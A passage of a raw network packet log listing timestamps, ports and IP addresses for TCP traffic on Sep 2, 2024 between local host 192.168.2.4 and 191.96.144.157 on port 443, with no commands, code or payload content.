Sep 2, 2024 11:42:54.277410984 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277416945 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277458906 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277462959 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277472019 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277501106 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277512074 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277519941 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277523041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277554035 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277581930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277626038 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277628899 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277671099 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277703047 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277749062 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277755022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277759075 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277793884 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277801037 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277843952 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277853966 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277892113 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277900934 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277904034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277928114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.277952909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277997971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.277998924 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278007984 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278043032 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278045893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278054953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278096914 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278152943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278198957 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278199911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278208971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278244972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278244972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278247118 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278263092 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278265953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278295994 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278330088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278369904 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278373957 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278378963 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278414965 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278491020 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278534889 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.278539896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.278579950 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.279706955 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360527992 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360704899 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360718966 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360726118 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360753059 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360761881 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360785007 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360789061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360806942 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360812902 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360855103 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360857964 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360865116 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360894918 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360930920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360976934 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.360980988 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.360996962 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361035109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361049891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361092091 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361095905 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361110926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361135960 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361140013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361151934 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361165047 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361193895 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361196995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361232996 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361282110 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361332893 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361336946 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361377954 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361382008 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361402035 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361432076 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361438036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361464977 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361485958 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361490011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361507893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361516953 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361552954 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361556053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361577034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361599922 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361603022 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361623049 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361624956 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361673117 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361676931 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361778021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361818075 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361820936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361829996 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361869097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361871958 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361877918 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.361908913 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.361999989 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362037897 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362041950 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362052917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362082005 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362085104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362099886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362116098 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362149000 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362152100 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362159014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362205029 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362207890 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362227917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362247944 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362268925 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362375021 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362420082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362421989 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362428904 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362466097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362466097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362468958 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362478971 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362483025 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362508059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362544060 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362585068 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362587929 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362598896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362638950 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362642050 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362653971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.362689972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.362700939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.363961935 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.444811106 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.444870949 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.444902897 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.444910049 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.444963932 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445024967 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445060968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445060968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445060968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445066929 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445075989 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445082903 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445112944 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445116043 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445130110 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445138931 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445175886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445183039 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445187092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445224047 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445240974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445278883 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445282936 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445291042 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445322037 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445324898 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445333004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445352077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445382118 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445384979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445425034 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445508957 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445554018 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445676088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445724964 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445735931 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445780993 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445780993 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445791006 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445818901 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445831060 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445852041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445899010 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445904970 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445909023 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445940018 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445940971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445956945 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.445960045 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.445987940 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446031094 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446069002 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446075916 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446079969 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446124077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446218014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446263075 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446264029 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446271896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446304083 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446317911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446361065 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446363926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446373940 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446412086 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446424007 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446470022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446492910 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446533918 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446548939 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446594000 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446594000 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446604013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446630001 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446681023 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446712017 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446783066 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446835041 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446835995 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446847916 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446885109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446885109 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446896076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.446928024 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.446945906 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.447000027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.447045088 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.447046041 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.447055101 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.447096109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.448137045 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529172897 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529232025 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529283047 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529328108 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529371023 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529371023 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529371023 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529378891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529393911 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529411077 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529433012 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529436111 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529448032 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529500961 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529505014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529514074 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529557943 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529562950 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529732943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529778004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529779911 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529788971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529825926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529840946 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529845953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529874086 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529874086 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529887915 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529891014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.529917955 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.529997110 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530047894 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530050039 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530056953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530097961 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530113935 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530160904 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530169964 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530173063 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530198097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530210972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530214071 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530247927 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530282974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530325890 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530337095 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530339956 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530365944 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530370951 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530390024 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530391932 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530421019 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530472994 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530518055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530529976 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530534983 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530567884 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530682087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530720949 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530729055 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530733109 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530775070 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530783892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530795097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530833960 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530842066 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530847073 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530874968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530875921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530922890 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530926943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.530970097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.530982971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.531033039 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.531033993 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.531043053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.531085968 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.531126976 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.531162024 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.531162024 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.531215906 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.531312943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.531354904 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.531358957 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.531363964 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.531397104 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.532691002 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613449097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613503933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613558054 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613559008 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613569975 CEST	443	49763	191.96.144.157	192.168.2.4
